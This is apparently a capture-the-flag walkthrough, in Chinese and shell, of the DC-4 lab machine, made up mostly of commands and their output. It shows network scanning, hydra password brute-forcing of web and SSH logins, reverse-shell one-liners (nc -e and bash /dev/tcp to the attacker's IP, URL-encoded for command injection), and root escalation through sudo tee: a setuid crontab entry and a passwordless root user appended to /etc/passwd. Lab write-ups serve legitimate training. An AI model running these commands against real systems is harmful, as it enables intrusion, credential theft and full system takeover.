渗透测试靶机之-----DC4

┌──(root💀AGsite)-[~]
└─# nmap -sP 192.168.33.0/24


Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-27 21:01 EDT
Nmap scan report for 192.168.33.1
Host is up (0.00013s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.33.2
Host is up (0.00015s latency).
MAC Address: 00:50:56:F3:FB:E6 (VMware)
Nmap scan report for 192.168.33.140
Host is up (0.00011s latency).
MAC Address: 00:0C:29:64:8A:3D (VMware)
Nmap scan report for 192.168.33.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:F1:32:23 (VMware)
Nmap scan report for 192.168.33.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 28.11 seconds


┌──(root💀AGsite)-[~]
└─# nmap -p- -A -v 192.168.33.140


Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-27 21:03 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:03
Completed NSE at 21:03, 0.00s elapsed
Initiating NSE at 21:03
Completed NSE at 21:03, 0.00s elapsed
Initiating NSE at 21:03
Completed NSE at 21:03, 0.00s elapsed
Initiating ARP Ping Scan at 21:03
Scanning 192.168.33.140 [1 port]
Completed ARP Ping Scan at 21:03, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:03
Completed Parallel DNS resolution of 1 host. at 21:03, 13.00s elapsed
Initiating SYN Stealth Scan at 21:03
Scanning 192.168.33.140 [65535 ports]
Discovered open port 80/tcp on 192.168.33.140
Discovered open port 22/tcp on 192.168.33.140
Completed SYN Stealth Scan at 21:03, 1.50s elapsed (65535 total ports)
Initiating Service scan at 21:03
Scanning 2 services on 192.168.33.140
Completed Service scan at 21:03, 6.10s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.33.140
NSE: Script scanning 192.168.33.140.
Initiating NSE at 21:03
Completed NSE at 21:03, 0.18s elapsed
Initiating NSE at 21:03
Completed NSE at 21:03, 0.01s elapsed
Initiating NSE at 21:03
Completed NSE at 21:03, 0.00s elapsed
Nmap scan report for 192.168.33.140
Host is up (0.00047s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 00:0C:29:64:8A:3D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.003 days (since Tue Apr 27 20:59:04 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 192.168.33.140


NSE: Script Post-scanning.
Initiating NSE at 21:03
Completed NSE at 21:03, 0.00s elapsed
Initiating NSE at 21:03
Completed NSE at 21:03, 0.00s elapsed
Initiating NSE at 21:03
Completed NSE at 21:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.53 seconds
           Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

Target: http://192.168.33.140/                                                                                                                               


Output File: /root/tools/dirsearch/reports/192.168.33.140/_21-04-27_21-12-32.txt


[21:12:32] Starting: 
[21:12:39] 302 -  704B  - /command.php  ->  index.php                                                                                   
[21:12:40] 301 -  170B  - /css  ->  http://192.168.33.140/css/                    
[21:12:41] 301 -  170B  - /images  ->  http://192.168.33.140/images/                                  
[21:12:41] 403 -  556B  - /images/           
[21:12:41] 200 -  506B  - /index.php                                                                           
[21:12:42] 302 -  206B  - /login.php  ->  index.php                                                     
[21:12:42] 302 -  163B  - /logout.php  ->  index.php

┌──(root💀AGsite)-[~/tools/pass]
└─# hydra -l admin -P rockyou.txt 192.168.33.140 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout"                                        
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).


Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-28 01:28:25
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.33.140:80/login.php:username=^USER^&password=^PASS^:S=logout
[80][http-post-form] host: 192.168.33.140   login: admin   password: happy
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-28 01:28:36

nc -lvp 2233

nc -e /bin/bash 192.168.33.128【kali的ip】 2233

bash -c 'bash -i >& /dev/tcp/192.168.33.128【kali的ip】/2233 0>&1'
但这里&会被解析为且，所以我们url编码一下【%26】
bash -c 'bash -i >%26 /dev/tcp/192.168.33.128【kali的ip】/2233 0>%261'

python -c "import pty;pty.spawn('/bin/bash')"

awk -F ':' 'print{$1}'

hydra -L olduser -P oldpass ssh://192.168.33.140:22

ssh jim@192.168.33.140

jim@dc-4:/var/mail$ cat /home/jim/mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
        (envelope-from <root@dc-4>)
        id 1hCiQe-0000gc-EC
        for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO


This is a test.

Hi Jim,


I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.


Password is:  ^xHhA&hvim0y


See ya,
Charles

charles@dc-4:/home$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin


User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee

charles@dc-4:/home$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.


  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit


MODE determines behavior with write errors on the outputs:
  'warn'         diagnose errors writing to any output
  'warn-nopipe'  diagnose errors writing to any output not a pipe
  'exit'         exit on error writing to any output
  'exit-nopipe'  exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.


GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'

ls -al /bin/sh

sudo teehee /etc/crontab


* * * * * root chmod 4777 /bin/sh

echo "a1batr0ss::0:0:::/bin/bash" | sudo teehee -a /etc/passwd


su - a1batr0ss